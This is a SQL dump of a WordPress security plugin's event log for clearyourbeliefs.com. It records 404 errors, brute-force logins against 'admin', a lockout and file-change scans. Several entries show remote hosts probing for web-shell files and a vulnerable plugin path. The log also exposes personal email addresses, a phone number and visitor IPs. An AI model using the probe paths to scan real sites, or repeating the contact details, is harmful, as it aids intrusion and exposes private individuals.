(85855, 'four_oh_four', '404 Error', 3, '2018-04-26 10:19:33', '2018-04-26 15:19:33', '69.50.201.221', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(85856, 'four_oh_four', '404 Error', 3, '2018-04-26 10:43:49', '2018-04-26 15:43:49', '198.55.103.41', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85857, 'four_oh_four', '404 Error', 3, '2018-04-26 10:43:52', '2018-04-26 15:43:52', '198.55.103.41', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85858, 'four_oh_four', '404 Error', 3, '2018-04-26 10:57:51', '2018-04-26 15:57:51', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85859, 'four_oh_four', '404 Error', 3, '2018-04-26 11:05:23', '2018-04-26 16:05:23', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85860, 'four_oh_four', '404 Error', 3, '2018-04-26 11:11:35', '2018-04-26 16:11:35', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85861, 'four_oh_four', '404 Error', 3, '2018-04-26 11:28:00', '2018-04-26 16:28:00', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85862, 'four_oh_four', '404 Error', 3, '2018-04-26 11:34:13', '2018-04-26 16:34:13', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85863, 'four_oh_four', '404 Error', 3, '2018-04-26 11:38:45', '2018-04-26 16:38:45', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85864, 'four_oh_four', '404 Error', 3, '2018-04-26 11:51:21', '2018-04-26 16:51:21', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85865, 'four_oh_four', '404 Error', 3, '2018-04-26 13:00:43', '2018-04-26 18:00:43', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85866, 'four_oh_four', '404 Error', 3, '2018-04-26 13:00:46', '2018-04-26 18:00:46', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85867, 'four_oh_four', '404 Error', 3, '2018-04-26 13:01:14', '2018-04-26 18:01:14', '185.220.101.1', '', 0, '/global-belief-relief/ZQbnZ/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85868, 'four_oh_four', '404 Error', 3, '2018-04-26 13:06:50', '2018-04-26 18:06:50', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85869, 'four_oh_four', '404 Error', 3, '2018-04-26 13:24:21', '2018-04-26 18:24:21', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85870, 'four_oh_four', '404 Error', 3, '2018-04-26 13:28:25', '2018-04-26 18:28:25', '178.159.37.126', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85871, 'four_oh_four', '404 Error', 3, '2018-04-26 13:28:26', '2018-04-26 18:28:26', '178.159.37.126', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85872, 'four_oh_four', '404 Error', 3, '2018-04-26 13:35:08', '2018-04-26 18:35:08', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85873, 'four_oh_four', '404 Error', 3, '2018-04-26 13:35:09', '2018-04-26 18:35:09', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85874, 'four_oh_four', '404 Error', 3, '2018-04-26 13:44:25', '2018-04-26 18:44:25', '198.50.183.41', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(85875, 'four_oh_four', '404 Error', 3, '2018-04-26 13:44:51', '2018-04-26 18:44:51', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85876, 'four_oh_four', '404 Error', 3, '2018-04-26 14:00:24', '2018-04-26 19:00:24', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85877, 'four_oh_four', '404 Error', 3, '2018-04-26 14:05:27', '2018-04-26 19:05:27', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85878, 'four_oh_four', '404 Error', 3, '2018-04-26 14:09:23', '2018-04-26 19:09:23', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85879, 'four_oh_four', '404 Error', 3, '2018-04-26 14:24:00', '2018-04-26 19:24:00', '198.58.75.9', '', 0, '/who-we-are/www.yoursedonacoach.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85880, 'four_oh_four', '404 Error', 3, '2018-04-26 14:25:46', '2018-04-26 19:25:46', '198.58.75.9', '', 0, '/who-we-are/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85881, 'four_oh_four', '404 Error', 3, '2018-04-26 14:25:55', '2018-04-26 19:25:55', '198.58.75.9', '', 0, '/who-we-are/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85882, 'four_oh_four', '404 Error', 3, '2018-04-26 14:26:04', '2018-04-26 19:26:04', '198.58.75.9', '', 0, '/who-we-are/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85883, 'four_oh_four', '404 Error', 3, '2018-04-26 14:26:15', '2018-04-26 19:26:15', '198.58.75.9', '', 0, '/who-we-are/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85884, 'four_oh_four', '404 Error', 3, '2018-04-26 14:26:17', '2018-04-26 19:26:17', '198.58.75.9', '', 0, '/who-we-are/www.breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85885, 'four_oh_four', '404 Error', 3, '2018-04-26 14:26:18', '2018-04-26 19:26:18', '198.58.75.9', '', 0, '/who-we-are/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85886, 'four_oh_four', '404 Error', 3, '2018-04-26 14:28:15', '2018-04-26 19:28:15', '198.58.75.9', '', 0, '/author/howard/www.breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85887, 'four_oh_four', '404 Error', 3, '2018-04-26 14:28:17', '2018-04-26 19:28:17', '198.58.75.9', '', 0, '/author/howard/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85888, 'four_oh_four', '404 Error', 3, '2018-04-26 14:28:18', '2018-04-26 19:28:18', '198.58.75.9', '', 0, '/author/howard/4154626692', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85889, 'four_oh_four', '404 Error', 3, '2018-04-26 14:28:19', '2018-04-26 19:28:19', '198.58.75.9', '', 0, '/who-we-are/4154626692/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85890, 'four_oh_four', '404 Error', 3, '2018-04-26 14:28:20', '2018-04-26 19:28:20', '198.58.75.9', '', 0, '/who-we-are/4154626692/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85891, 'four_oh_four', '404 Error', 3, '2018-04-26 14:29:01', '2018-04-26 19:29:01', '198.58.75.9', '', 0, '/contacts', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85892, 'four_oh_four', '404 Error', 3, '2018-04-26 14:29:03', '2018-04-26 19:29:03', '198.58.75.9', '', 0, '/price', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85893, 'four_oh_four', '404 Error', 3, '2018-04-26 14:29:14', '2018-04-26 19:29:14', '198.58.75.9', '', 0, '/kupit-diplom-o-vysshem-obrazovanii', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85894, 'four_oh_four', '404 Error', 3, '2018-04-26 14:29:24', '2018-04-26 19:29:24', '198.58.75.9', '', 0, '/author/geri/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85895, 'four_oh_four', '404 Error', 3, '2018-04-26 14:30:49', '2018-04-26 19:30:49', '198.58.75.9', '', 0, '/author/hardy/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85896, 'four_oh_four', '404 Error', 3, '2018-04-26 14:31:37', '2018-04-26 19:31:37', '198.58.75.9', '', 0, '/author/maria/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85897, 'four_oh_four', '404 Error', 3, '2018-04-26 14:32:41', '2018-04-26 19:32:41', '198.58.75.9', '', 0, '/who-we-are/4154626692/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85898, 'four_oh_four', '404 Error', 3, '2018-04-26 14:40:45', '2018-04-26 19:40:45', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85899, 'four_oh_four', '404 Error', 3, '2018-04-26 15:59:24', '2018-04-26 20:59:24', '185.236.118.114', '', 0, '/ref=nb_sb_noss_null', 'http://www.amazon.com', 'a:1:{s:12:"query_string";s:0:"";}'),
(85900, 'four_oh_four', '404 Error', 3, '2018-04-26 15:59:28', '2018-04-26 20:59:28', '185.236.118.114', '', 0, '/ref=nb_sb_noss_null', 'http://www.amazon.com', 'a:1:{s:12:"query_string";s:0:"";}'),
(85901, 'four_oh_four', '404 Error', 3, '2018-04-26 15:59:31', '2018-04-26 20:59:31', '185.236.118.114', '', 0, '/ref=nb_sb_noss_null', 'http://www.amazon.com', 'a:1:{s:12:"query_string";s:0:"";}'),
(85902, 'four_oh_four', '404 Error', 3, '2018-04-26 15:59:35', '2018-04-26 20:59:35', '185.236.118.114', '', 0, '/ref=nb_sb_noss_null', 'http://www.amazon.com', 'a:1:{s:12:"query_string";s:0:"";}'),
(86305, 'four_oh_four', '404 Error', 3, '2018-04-28 16:43:28', '2018-04-28 21:43:28', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86306, 'file_change', 'File Changes Detected', 8, '2018-04-28 16:50:03', '2018-04-28 21:50:03', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:0:{}s:7:"changed";a:0:{}s:6:"memory";s:5:"25.43";}'),
(86307, 'four_oh_four', '404 Error', 3, '2018-04-28 17:17:38', '2018-04-28 22:17:38', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86308, 'four_oh_four', '404 Error', 3, '2018-04-28 17:37:42', '2018-04-28 22:37:42', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86309, 'four_oh_four', '404 Error', 3, '2018-04-28 18:25:20', '2018-04-28 23:25:20', '115.73.14.213', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86310, 'four_oh_four', '404 Error', 3, '2018-04-28 18:25:22', '2018-04-28 23:25:22', '115.73.14.213', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86311, 'four_oh_four', '404 Error', 3, '2018-04-28 18:26:54', '2018-04-28 23:26:54', '157.55.39.235', '', 0, '/certified-practitioners/2147483647/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86312, 'four_oh_four', '404 Error', 3, '2018-04-28 19:05:06', '2018-04-29 00:05:06', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86313, 'four_oh_four', '404 Error', 3, '2018-04-28 19:06:36', '2018-04-29 00:06:36', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}');
INSERT INTO `cyb_itsec_log` (`log_id`, `log_type`, `log_function`, `log_priority`, `log_date`, `log_date_gmt`, `log_host`, `log_username`, `log_user`, `log_url`, `log_referrer`, `log_data`) VALUES
(86314, 'four_oh_four', '404 Error', 3, '2018-04-28 19:06:37', '2018-04-29 00:06:37', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86315, 'four_oh_four', '404 Error', 3, '2018-04-28 19:32:12', '2018-04-29 00:32:12', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86118, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-27 16:33:04', '2018-04-27 21:33:04', '51.255.202.66', 'admin', 0, '', '', 'a:0:{}'),
(86316, 'four_oh_four', '404 Error', 3, '2018-04-28 19:38:12', '2018-04-29 00:38:12', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86119, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-27 16:33:04', '2018-04-27 21:33:04', '51.255.202.66', 'admin', 0, '', '', 'a:0:{}'),
(86120, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-27 16:33:04', '2018-04-27 21:33:04', '51.255.202.66', 'admin', 0, '', '', 'a:0:{}'),
(86121, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-27 16:33:04', '2018-04-27 21:33:04', '51.255.202.66', 'admin', 0, '', '', 'a:0:{}'),
(86122, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-27 16:33:04', '2018-04-27 21:33:04', '51.255.202.66', 'admin', 0, '', '', 'a:0:{}'),
(86123, 'lockout', 'Host or User Lockout', 10, '2018-04-27 16:33:04', '2018-04-27 21:33:04', '51.255.202.66', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-27 16:48:04";s:11:"expires_gmt";s:19:"2018-04-27 21:48:04";s:4:"type";s:11:"brute_force";}'),
(86124, 'file_change', 'File Changes Detected', 8, '2018-04-27 16:47:31', '2018-04-27 21:47:31', '', '', 0, '', '', 'a:4:{s:5:"added";a:1:{s:92:"wp-content/uploads/ithemes-security/backups/backup-clear-your-beliefs-1524806544-ClhzaA7.zip";a:2:{s:1:"d";s:10:"1524824546";s:1:"h";s:32:"eaa024cfd73cc42fb2f61890659ee565";}}s:7:"removed";a:0:{}s:7:"changed";a:0:{}s:6:"memory";s:4:"39.4";}'),
(86125, 'four_oh_four', '404 Error', 3, '2018-04-27 16:55:36', '2018-04-27 21:55:36', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86126, 'four_oh_four', '404 Error', 3, '2018-04-27 16:55:37', '2018-04-27 21:55:37', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86127, 'four_oh_four', '404 Error', 3, '2018-04-27 16:55:39', '2018-04-27 21:55:39', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86128, 'four_oh_four', '404 Error', 3, '2018-04-27 16:55:40', '2018-04-27 21:55:40', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86129, 'four_oh_four', '404 Error', 3, '2018-04-27 16:58:37', '2018-04-27 21:58:37', '85.185.81.114', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86130, 'four_oh_four', '404 Error', 3, '2018-04-27 16:58:39', '2018-04-27 21:58:39', '85.185.81.114', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86131, 'four_oh_four', '404 Error', 3, '2018-04-27 17:00:44', '2018-04-27 22:00:44', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86132, 'four_oh_four', '404 Error', 3, '2018-04-27 17:26:06', '2018-04-27 22:26:06', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86133, 'four_oh_four', '404 Error', 3, '2018-04-27 17:33:16', '2018-04-27 22:33:16', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86134, 'four_oh_four', '404 Error', 3, '2018-04-27 17:39:08', '2018-04-27 22:39:08', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86135, 'four_oh_four', '404 Error', 3, '2018-04-27 17:47:22', '2018-04-27 22:47:22', '91.121.144.97', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86136, 'four_oh_four', '404 Error', 3, '2018-04-27 17:47:23', '2018-04-27 22:47:23', '91.121.144.97', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86137, 'four_oh_four', '404 Error', 3, '2018-04-27 18:07:36', '2018-04-27 23:07:36', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86138, 'four_oh_four', '404 Error', 3, '2018-04-27 18:10:58', '2018-04-27 23:10:58', '51.15.80.14', '', 0, '/global-belief-relief/wp-caches.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86139, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:01', '2018-04-27 23:11:01', '51.15.80.14', '', 0, '/global-belief-relief/ass.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86140, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:04', '2018-04-27 23:11:04', '51.15.80.14', '', 0, '/global-belief-relief/_.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86141, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:07', '2018-04-27 23:11:07', '51.15.80.14', '', 0, '/global-belief-relief/u.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86142, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:10', '2018-04-27 23:11:10', '51.15.80.14', '', 0, '/global-belief-relief/wp-content/plugins/wordpress/up.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86143, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:13', '2018-04-27 23:11:13', '51.15.80.14', '', 0, '/global-belief-relief/wp-content/license.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86144, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:17', '2018-04-27 23:11:17', '51.15.80.14', '', 0, '/global-belief-relief/alpha.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86145, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:20', '2018-04-27 23:11:20', '51.15.80.14', '', 0, '/global-belief-relief/sec.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86146, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:25', '2018-04-27 23:11:25', '51.15.80.14', '', 0, '/global-belief-relief/wp-content/plugins/Aviliate/systems.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86147, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:28', '2018-04-27 23:11:28', '51.15.80.14', '', 0, '/global-belief-relief/readme.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86148, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:31', '2018-04-27 23:11:31', '51.15.80.14', '', 0, '/global-belief-relief/sitemap.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86149, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:39', '2018-04-27 23:11:39', '51.15.80.14', '', 0, '/global-belief-relief/pplugins.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86150, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:42', '2018-04-27 23:11:42', '51.15.80.14', '', 0, '/global-belief-relief/aul.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86151, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:45', '2018-04-27 23:11:45', '51.15.80.14', '', 0, '/global-belief-relief/wp-content/plugins/html404/idx.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86152, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:47', '2018-04-27 23:11:47', '51.15.80.14', '', 0, '/global-belief-relief/so.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86153, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:51', '2018-04-27 23:11:51', '51.15.80.14', '', 0, '/global-belief-relief/res/cgi.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86154, 'four_oh_four', '404 Error', 3, '2018-04-27 18:11:54', '2018-04-27 23:11:54', '51.15.80.14', '', 0, '/global-belief-relief/formas.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86155, 'four_oh_four', '404 Error', 3, '2018-04-27 18:21:42', '2018-04-27 23:21:42', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86156, 'four_oh_four', '404 Error', 3, '2018-04-27 18:22:00', '2018-04-27 23:22:00', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86157, 'four_oh_four', '404 Error', 3, '2018-04-27 18:22:01', '2018-04-27 23:22:01', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86158, 'four_oh_four', '404 Error', 3, '2018-04-27 18:22:03', '2018-04-27 23:22:03', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86159, 'four_oh_four', '404 Error', 3, '2018-04-27 18:22:04', '2018-04-27 23:22:04', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86160, 'four_oh_four', '404 Error', 3, '2018-04-27 18:28:17', '2018-04-27 23:28:17', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86161, 'four_oh_four', '404 Error', 3, '2018-04-27 18:30:07', '2018-04-27 23:30:07', '185.86.164.103', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86162, 'four_oh_four', '404 Error', 3, '2018-04-27 18:33:34', '2018-04-27 23:33:34', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86163, 'four_oh_four', '404 Error', 3, '2018-04-27 18:43:39', '2018-04-27 23:43:39', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86164, 'four_oh_four', '404 Error', 3, '2018-04-27 18:49:53', '2018-04-27 23:49:53', '157.55.39.182', '', 0, '/certified-coaches/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86165, 'four_oh_four', '404 Error', 3, '2018-04-27 19:03:23', '2018-04-28 00:03:23', '66.249.69.96', '', 0, '/parklane-online-review/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86166, 'four_oh_four', '404 Error', 3, '2018-04-27 19:21:51', '2018-04-28 00:21:51', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86167, 'four_oh_four', '404 Error', 3, '2018-04-27 19:22:06', '2018-04-28 00:22:06', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86168, 'four_oh_four', '404 Error', 3, '2018-04-27 19:39:06', '2018-04-28 00:39:06', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86169, 'four_oh_four', '404 Error', 3, '2018-04-27 20:09:35', '2018-04-28 01:09:35', '196.247.17.195', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86170, 'four_oh_four', '404 Error', 3, '2018-04-27 20:09:36', '2018-04-28 01:09:36', '196.247.17.195', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86171, 'four_oh_four', '404 Error', 3, '2018-04-27 20:11:59', '2018-04-28 01:11:59', '149.56.43.112', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86172, 'four_oh_four', '404 Error', 3, '2018-04-27 20:25:15', '2018-04-28 01:25:15', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86173, 'four_oh_four', '404 Error', 3, '2018-04-27 20:33:32', '2018-04-28 01:33:32', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86174, 'four_oh_four', '404 Error', 3, '2018-04-27 20:43:53', '2018-04-28 01:43:53', '179.198.167.170', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86175, 'four_oh_four', '404 Error', 3, '2018-04-27 20:58:22', '2018-04-28 01:58:22', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86176, 'four_oh_four', '404 Error', 3, '2018-04-27 21:10:53', '2018-04-28 02:10:53', '111.252.85.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86177, 'four_oh_four', '404 Error', 3, '2018-04-27 21:10:55', '2018-04-28 02:10:55', '111.252.85.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86178, 'four_oh_four', '404 Error', 3, '2018-04-27 21:34:39', '2018-04-28 02:34:39', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86179, 'four_oh_four', '404 Error', 3, '2018-04-27 21:42:34', '2018-04-28 02:42:34', '66.249.69.99', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86180, 'four_oh_four', '404 Error', 3, '2018-04-27 21:51:39', '2018-04-28 02:51:39', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86181, 'four_oh_four', '404 Error', 3, '2018-04-27 21:55:44', '2018-04-28 02:55:44', '46.118.155.165', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86182, 'four_oh_four', '404 Error', 3, '2018-04-27 22:03:13', '2018-04-28 03:03:13', '104.238.153.240', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86183, 'four_oh_four', '404 Error', 3, '2018-04-27 22:03:13', '2018-04-28 03:03:13', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86184, 'four_oh_four', '404 Error', 3, '2018-04-27 22:10:47', '2018-04-28 03:10:47', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86185, 'four_oh_four', '404 Error', 3, '2018-04-27 22:19:27', '2018-04-28 03:19:27', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86186, 'four_oh_four', '404 Error', 3, '2018-04-27 22:19:37', '2018-04-28 03:19:37', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86187, 'four_oh_four', '404 Error', 3, '2018-04-27 22:51:22', '2018-04-28 03:51:22', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(86188, 'four_oh_four', '404 Error', 3, '2018-04-27 22:51:24', '2018-04-28 03:51:24', '52.47.168.171', '', 0, '/global-belief-relief/ads.txt', 'http://www.globalbeliefrelief.com/ads.txt', 'a:1:{s:12:"query_string";s:0:"";}'),
(86189, 'four_oh_four', '404 Error', 3, '2018-04-27 22:55:55', '2018-04-28 03:55:55', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86190, 'four_oh_four', '404 Error', 3, '2018-04-27 22:58:40', '2018-04-28 03:58:40', '163.172.197.129', '', 0, '/global-belief-relief/upgrade.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86191, 'four_oh_four', '404 Error', 3, '2018-04-27 23:24:55', '2018-04-28 04:24:55', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86192, 'four_oh_four', '404 Error', 3, '2018-04-27 23:24:56', '2018-04-28 04:24:56', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86193, 'four_oh_four', '404 Error', 3, '2018-04-27 23:24:59', '2018-04-28 04:24:59', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
